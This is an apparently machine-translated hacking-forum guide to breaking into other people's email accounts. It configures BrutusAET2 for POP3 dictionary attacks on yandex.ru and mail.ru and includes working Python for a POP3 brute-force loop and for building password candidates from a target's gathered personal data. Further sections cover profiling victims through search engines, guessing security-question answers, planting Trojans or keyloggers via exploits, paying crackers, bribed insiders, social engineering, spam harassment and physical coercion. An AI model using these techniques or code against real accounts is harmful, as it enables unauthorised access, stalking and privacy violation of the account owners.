This page is a machine translation of the Russian original; some typos may remain.

Cracking mail accounts with BrutusAET2

THE MATERIAL IS POSTED FOR INFORMATIONAL PURPOSES ONLY. THE AUTHOR BEARS NO RESPONSIBILITY FOR ITS USE.

So, I want to show you how to take over a mailbox (e-mail account) using the BrutusAET2 program.

Let's start.

We will need:

1) The password cracking program BrutusAET2, which can be downloaded from here:
http://www.hoobie.net/brutus/brutus-aet2.zip

2) Dictionaries (word lists), which can be taken from here:
http://www.passwords.ru/dic.php
http://www.insidepro.com/eng/download.shtml
http://www.outpost9.com/files/WordLists.html
http://www.acolytez.com/dict/
http://www.phreak.com/html/wordlists.shtml
http://www.mobilstar.ru/files/dict/

3) Steady hands (basic competence).

As an example, I will take over a mailbox on yandex.ru.

Setting up the password cracker BrutusAET2:

1) Open the program.
2) In the Target field enter pop.yandex.ru
3) In the Type field select POP3

Connection Options:

1) Port: 110.
2) Connections: the maximum, i.e. 60. (A real mail service will usually throttle or temporarily block a source that opens that many login sessions at once, after which even correct guesses come back as failures; lower it if attempts start failing en masse.)
3) Timeout: the maximum, 60.


POP3 options:
Leave them as they are =)


Authentication options:


If we want to run through a list of mailboxes, we need to create a text file, let's call it users.txt, and put the list of user names in it.
For example:
Vasja_pupkin
Abcdefgh
Abcabc

In the program, tick Use Username.

Use Username: give the path to the user list.


Now the password list...
Create a text file words.txt and put the passwords in it.
For example:
Password
Pass
123


In the program select:

Pass mode: Word list
Pass file: the path to the password list.


Mailboxes on mail.ru are cracked just as easily: put pop.mail.ru in Target and leave everything else the same.

In general, it should all look like the screenshot:
[screenshot: Hacking mail]
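The POP3 exchange that Brutus drives for every guess, as an added example that is not part of the original article and not Brutus's own code: a Python dictionary attack (the user list as the outer loop, the word list as the inner loop, one connection per guess) run against a throwaway fake POP3 server on localhost, so it works offline. The fake server, its single valid credential, the two lists and its lockout threshold of four failed PASS commands are all constructed for the demo; a real provider's throttling rules are its own.

```python
"""Added example (not from the original page): the POP3 login exchange that
BrutusAET2 drives per guess, run as a dictionary attack against a fake POP3
server on localhost. Credentials, lists and lockout threshold are constructed."""
import poplib
import socket
import threading

VALID_USER, VALID_PASS = "vasja_pupkin", "123"  # the one pair the fake server accepts
USERS = ["vasja_pupkin", "abcdefgh"]             # stands in for users.txt
WORDS = ["password", "pass", "123"]              # stands in for words.txt
LOCKOUT_AFTER = 4  # failed PASS commands before the fake server refuses all logins


def _serve_one(conn, stats):
    """Minimal POP3 AUTHORIZATION state (RFC 1939): greeting, USER, PASS, QUIT."""
    rd = conn.makefile("rb")
    conn.sendall(b"+OK fake POP3 ready\r\n")
    user = None
    while True:
        line = rd.readline()
        if not line:
            break
        cmd, _, arg = line.decode(errors="replace").rstrip("\r\n").partition(" ")
        cmd = cmd.upper()
        if cmd == "USER":
            user = arg
            conn.sendall(b"+OK\r\n")  # +OK for any name: reveals nothing about existence
        elif cmd == "PASS":
            stats["attempts"] += 1
            if stats["failures"] >= LOCKOUT_AFTER:
                # Throttling a noisy source is what a real service does; note that
                # a correct guess is rejected too once the source is locked out.
                conn.sendall(b"-ERR [AUTH] too many failures, try later\r\n")
            elif (user, arg) == (VALID_USER, VALID_PASS):
                conn.sendall(b"+OK logged in\r\n")
            else:
                stats["failures"] += 1
                conn.sendall(b"-ERR [AUTH] invalid login\r\n")
        elif cmd == "QUIT":
            conn.sendall(b"+OK bye\r\n")
            break
        else:
            conn.sendall(b"-ERR unknown command\r\n")
    rd.close()
    conn.close()


def start_fake_server():
    """Listen on an ephemeral localhost port; returns (socket, port, stats)."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    stats = {"attempts": 0, "failures": 0}

    def accept_loop():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return  # listening socket was closed: stop serving
            _serve_one(conn, stats)

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv, srv.getsockname()[1], stats


def try_login(host, port, user, word):
    """One guess = one connection, as Brutus does it. Returns 'ok', 'bad' or 'locked'."""
    client = poplib.POP3(host, port, timeout=5)
    try:
        client.user(user)
        client.pass_(word)
        return "ok"
    except poplib.error_proto as exc:
        msg = exc.args[0]
        msg = msg if isinstance(msg, bytes) else str(msg).encode()
        return "locked" if b"too many" in msg else "bad"
    finally:
        try:
            client.quit()
        except (poplib.error_proto, OSError):
            client.close()


def dictionary_attack(host, port, users, words):
    """Users outer, words inner, like Brutus with a user list plus a word list.
    Stops at the first 'locked' answer because every further guess is wasted."""
    found, log = {}, []
    for user in users:
        for word in words:
            result = try_login(host, port, user, word)
            log.append((user, word, result))
            if result == "ok":
                found[user] = word
                break
            if result == "locked":
                return found, log
    return found, log


def run_demo():
    """Start the fake server, run the attack, tear down; returns (found, log, stats)."""
    srv, port, stats = start_fake_server()
    try:
        found, log = dictionary_attack("127.0.0.1", port, USERS, WORDS)
    finally:
        try:
            srv.shutdown(socket.SHUT_RDWR)  # wakes the blocked accept()
        except OSError:
            pass
        srv.close()
    return found, log, stats


if __name__ == "__main__":
    found, log, stats = run_demo()
    for user, word, result in log:
        print(f"{user}:{word} -> {result}")
    print("found:", found, "| server saw", stats["attempts"], "PASS attempts")
```

Running it prints two -ERR answers, the +OK for vasja_pupkin:123, and then the fake server locking the source out after the fourth failure, so the last guess comes back as "locked" even though the same password would have been right for an unlocked account. That is the practical cost of the "Connections: 60" setting above against any provider that throttles: the tool cannot tell a wrong password from a throttled attempt unless it reads the -ERR text.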

Some useful links from me...

Hashes: password cracking

Dictionaries:

Links!!! All the links in the world!!!




================================================= ======================

Password guessing methods for beginners


Method number 1. "Brutus" / long /

The first method is Brutus (brute force), i.e. exhaustive password guessing.
What you need:
1. A brute-force program: BrutusAET2 (WWWHack or similar)
2. The address of the mail service's incoming (POP3) server. It can be found in the help or FAQ section of the mail provider's site.
3. Preferably also a password dictionary (word list)
..
Pros: the password will always be found eventually (if not by dictionary, then by exhaustive search).
Cons: a guaranteed result may take several millennia or millions of years.
..
Recommendations:
Since exhaustive search is the slowest way, to shorten it at all you should:
a. Register yourself a mailbox on the service you are going to brute-force. When registering, pay attention to the "Password" field: your task is to find out the service's minimum and maximum password length and the allowed characters (this is usually written next to the field).
b. Open the password dictionary (I prefer the Raptor program for this), sort it by password length (shorter to longer), and remove passwords that do not fit the service's length requirements or contain forbidden characters.
c. Use the data from the "Collecting information" method (see below).
..
Help for those who do not have the Internet:
Brute Force (in slang: "brute"): exhaustive search, trying every combination. Example of exhaustive search:
aaa
aab
aac
...
zzx
zzw
zzz
etc.

Example of a "dictionary" search:
abila
abott
abitz
admin
etc.
That is, since many people use meaningful, easy-to-remember words as passwords, why go through characters for ages when going through words is faster?
P.S. Where to get the tools mentioned in the method:
BrutusAET2 -> http://www.hoobie.net/brutus/brutus-download.html
Raptor -> http://madmax.deny.de/products/raptor/download.htm
P.P.S. Commonly chosen passwords are covered in another, separate article.



Method number 2. "Collecting information" / requires attention /

What you need:
Search engines:
http://google.com
http://ya.ru
http://rambler.ru
http://aport.ru
http://yahoo.com
How we do it:
Type the target mail address into the search engines and see where it turns up. Go to each hit and copy everything you find (where it occurs, on which site, what the person wrote and asked, when, under which login) into a notepad file for further analysis.
Then analyze it, draw general conclusions about the person's interests, and try the findings (year of birth, nickname, name, interests, etc.) as passwords.
..
Recommendations:
You need to search in all the search engines both for the full address my_email@mail.ru and for the login alone, my_email.
On a forum (once you have found the login/nickname): right-click the avatar image and look at its path (what if it was not uploaded to the forum but served from the person's own website? although it could also be borrowed from someone else). Also open the profile and copy everything there to Notepad (there may be an ICQ number, year of birth, interests, etc.). Do not forget the "Find all posts by user" link in the profile (if there is one). Read carefully; there may be a clue (keep the "secret question" in mind). Everything informative, other than "Gyg", "Lol", etc., goes into Notepad.
If we find a second mail address, we run it through the search engines again.
The same applies to ICQ (another round through the search engines). For ICQ, do not forget to look at [forbidden link]
Also do not forget to search by mail address and nickname on http://www.icq.com
If the person has an original nickname, e.g. AmSuPerrR, run it through the search engines too. If the nickname is a common one like Alex, you are unlikely to get through 12 million pages (though you can try using search-query syntax and "search within results").
When you have accumulated a decent amount of information in Notepad, start forming a password list for this user from it. You must try the year of birth in different formats. For example, you found the date of birth 01.01.2005.
Try these options:
01012005
010105
112005
1105
Also try these (where my_email is the login):
my_email2005
my_email05
Or:
hisname2005
hisname05
etc.
Substitution is easy. Just copy into Notepad, "decompose" it word by word into a column, and write several variants for each item found. After that you can use the Brutus method.
Also check whether the "second mailboxes" you found still exist. It may turn out they were registered long ago and are no longer needed. Then register them for yourself and try to recover through them the passwords to forums, chats, directories, etc.
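An added example (not from the original article) that puts the two procedures above into code: the candidate generation of "Collecting information" (the date formats and the login+year suffixes the text lists) and the policy filtering and shortest-first sorting that the "Brutus" method recommends in points a and b, plus the exhaustive enumeration (aaa, aab, ...) the tool falls back to, so the two list sizes can be compared. The login my_email, the gathered words, the date 01.01.2005 and the password policy of 6 to 20 Latin letters, digits and underscores are constructed inputs.

```python
"""Added example (not from the original page): build a targeted candidate list
from gathered facts in the formats the text lists, filter it against the mail
service's password rules, sort short-to-long, and compare with blind brute
force. All names, dates and policy values are constructed."""
import itertools
import string
from datetime import date


def date_forms(d):
    """Date of birth in the formats the text lists:
    DDMMYYYY, DDMMYY, DMYYYY, DMYY, plus the bare YYYY and YY."""
    yyyy, yy = str(d.year), f"{d.year % 100:02d}"
    return [
        f"{d.day:02d}{d.month:02d}{yyyy}",
        f"{d.day:02d}{d.month:02d}{yy}",
        f"{d.day}{d.month}{yyyy}",
        f"{d.day}{d.month}{yy}",
        yyyy,
        yy,
    ]


def case_forms(word):
    """The capitalisations people actually type."""
    return {word, word.lower(), word.capitalize(), word.upper()}


def build_candidates(login, words, dob):
    """Cross the login and gathered words with the date forms and each other,
    e.g. my_email2005, my_email05, Vasja05, 2005vasja, vasjamy_email."""
    dates = date_forms(dob)
    bases = set()
    for w in [login, *words]:
        bases |= case_forms(w)
    cands = set(bases) | set(dates)
    for b in bases:
        for s in dates:
            cands.add(b + s)
            cands.add(s + b)
    for a, b in itertools.permutations(sorted(bases), 2):
        cands.add(a + b)
    return cands


def filter_by_policy(cands, min_len, max_len, allowed):
    """Drop candidates the service would never have accepted (wrong length or
    forbidden characters) and order the rest shortest first, so the cheap
    guesses go out before the long ones."""
    allowed = set(allowed)
    kept = [c for c in cands if min_len <= len(c) <= max_len and set(c) <= allowed]
    return sorted(kept, key=lambda c: (len(c), c))


def brute_force_space(charset, min_len, max_len):
    """Exhaustive enumeration (aaa, aab, aac, ...) over the same policy; this
    is what the tool falls back to once the dictionary is exhausted."""
    for n in range(min_len, max_len + 1):
        for tup in itertools.product(charset, repeat=n):
            yield "".join(tup)


def keyspace_size(charset, min_len, max_len):
    """Number of strings brute_force_space would yield: sum of |charset|**n."""
    return sum(len(charset) ** n for n in range(min_len, max_len + 1))


def demo():
    """Constructed target profile (login, name and nickname from a forum profile,
    date of birth from a post) and constructed policy; returns (raw, filtered)."""
    cands = build_candidates("my_email", ["Vasja", "pupkin"], date(2005, 1, 1))
    policy_chars = string.ascii_letters + string.digits + "_"
    ready = filter_by_policy(cands, 6, 20, policy_chars)
    return cands, ready


if __name__ == "__main__":
    cands, ready = demo()
    print(len(cands), "raw candidates ->", len(ready), "after the policy filter")
    print("first guesses:", ready[:8])
    blind = keyspace_size(string.ascii_letters + string.digits + "_", 6, 20)
    print("strings a blind brute force over the same rules would try:", blind)
```

The targeted list is a few hundred strings; the blind keyspace for the same rules is a number with dozens of digits, which is the "millions of years" the Brutus method warns about and the reason the information-gathering step comes first.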



Method number 3. "Password recovery" / sometimes effective /

How we do it:
First, go to the mail service and click the "Forgot your password?" link (or similar). Look at what the secret question is.
For example, if it is "My favourite dish", then for girls you can try the word "ice cream".
If it is "Grandmother's year of birth", "Passport number" or "Mother's maiden name", then try 111, 123, 12345, the year of birth of the person whose password you are "recovering"; perhaps the answer is the year the mailbox was registered, and so on. Not many people know their grandmother's year of birth or remember their mother's maiden name. The passport number is harder, since some people really do take it and type it in exactly. But still try 111, 123...
The data collected in the "Collecting information" method can also help here.

Added (Eco[L]og):
Sometimes the secret question can be something like: 1234567qwerty
Then, in some cases, the answer to it may be 1234567qwerty
Or something similar, typed by the "mashing the keyboard" method (guessing that is practically unrealistic)



Method number 4. "Recovery via another service" / in passing you get both the mail password and the forum/chat database /

The whole point is that the mail password is harder to guess than the password to a forum, chat, dating service, LiveJournal, etc., i.e. to the places that the person whose mail is being "recovered" visits or visited. So we go round all the sites, forums, etc. that came into view during "Collecting information", look at what runs there (for example, which forum software) and reduce the task to finding vulnerabilities in that forum (using the same google.ru).
There is a chance (not a big one, but a chance) that the forum password will also fit the mailbox.



Method number 5. "Trojan" / demanding /

The method speaks for itself. The task is to plant a Trojan or some keylogger on the target (which you need to have, accordingly) and wait for their reports (logs).
The "Software vulnerabilities" and "SE / Social engineering /" methods help with getting it in.



Method number 6. "Software vulnerabilities" / requires the relevant knowledge /

This is really a helper method for the Trojan method. Getting a Trojan in takes a lot of effort, but it becomes easier if you know current vulnerabilities in software: browsers, mail clients (Outlook, The Bat!, etc.), perhaps ICQ. Then the task reduces to sending a link to your site, so that when the visitor opens it the Trojan is loaded and run through the browser vulnerability, or to sending a specially crafted letter.



Method number 7. "Vulnerabilities of mail services" / also requires knowledge, or the ability to use a search engine /

This method relates directly to vulnerabilities in the mail services themselves. They turn up from time to time: from a letter that, when viewed in the user's browser, changes his settings, to (until recently) intercepting the request that changes the password of your own mailbox, modifying it, and thereby changing the password of the target mailbox. And so on.



Method number 8. "Have a hundred rubles, friends can wait" / paid; requires a job and a WebMoney wallet /

You go to a hacking-related site and ask someone to "remind" you the password for a certain fee. But be careful when paying, because there are a lot of scams (and there always have been).
..
Recommendations:
Never pay in advance (it is a 100% guarantee that nobody will "remind" you anything; more precisely, some people can do the job, but they set the terms of when you pay, before or after, and they mostly take payment after completing the order).
Do not accept as proof a letter that appears to be sent from the mailbox you need (the sender address of a letter is trivial to forge).
Also do not immediately accept "proof" of the following form:
You send some letter to the mailbox you need, and then (after a while) they send you the text of that letter.
As protection against scams, use the "via a guarantor" scheme, or the scheme above, slightly corrected:
1. You agree on a time when you are both online.
2. You send some text to the mailbox you need, and they must tell you immediately what text you sent.
Then at least there is some assurance that the mailbox is under their control. But the money transfer you negotiate yourself.



Method number 9. "Don't have a hundred rubles, have a hundred friends" / ability to make acquaintances /

Just have a good friend (an admin, support staff or, better, a director) working either at the company that hosts the mailbox or at the hosting/ISP that serves that company.
Or a person who, at the risk of attention from the FSB, FAPSI or Directorate "K" (R), will exceed his official authority, find out the password from the mail service's support and tell you.
This is a very bad and wrong method, and very rarely encountered (thank God).
Or have a friend who administers the forum, chat, etc. where the target hangs out. If you are not acquainted, nothing prevents you from getting acquainted somehow...



Method number 10. "SE / Social engineering /" / the most precise method; requires the ability to set the task and analyze; training required /

Many of the previously described methods converge on and overlap with this one. Likewise, this method needs data from the other methods (such as "Collecting information", "Vulnerabilities of mail services", etc.).
This is the broadest and most extensive method, so for now only briefly; it will go into a separate article.
The general idea is to get the mail password directly from the owner, or to persuade him to perform the actions you need (such as a guaranteed launch of the Trojan).
By "getting it directly from the owner" it is understood that the owner himself "tells you" the password, but without even realising that he has given it to you (maybe he will realise, but later).
P.S. The SE method and its sub-methods are for the next article (if there is interest).



Method number 11. "What the hell does he need it for?" / long but relatively simple method /

The essence of the method is to make the owner give up the mailbox voluntarily (sometimes, after all, one needs to "recover" it not to read it but to own that particular address). The easiest way is to spam the mailbox periodically. If the owner is not savvy enough to get rid of such spam, in a couple of weeks he will get tired of shovelling tons of letters out of the box and will abandon it. And mail services are not elastic: when the mailbox has a space limit and is not visited, it eventually gets deleted.



And finally, an alternative method
Method number 12. "Fear" / criminal /

You catch the owner in a back alley...

by antichat.ru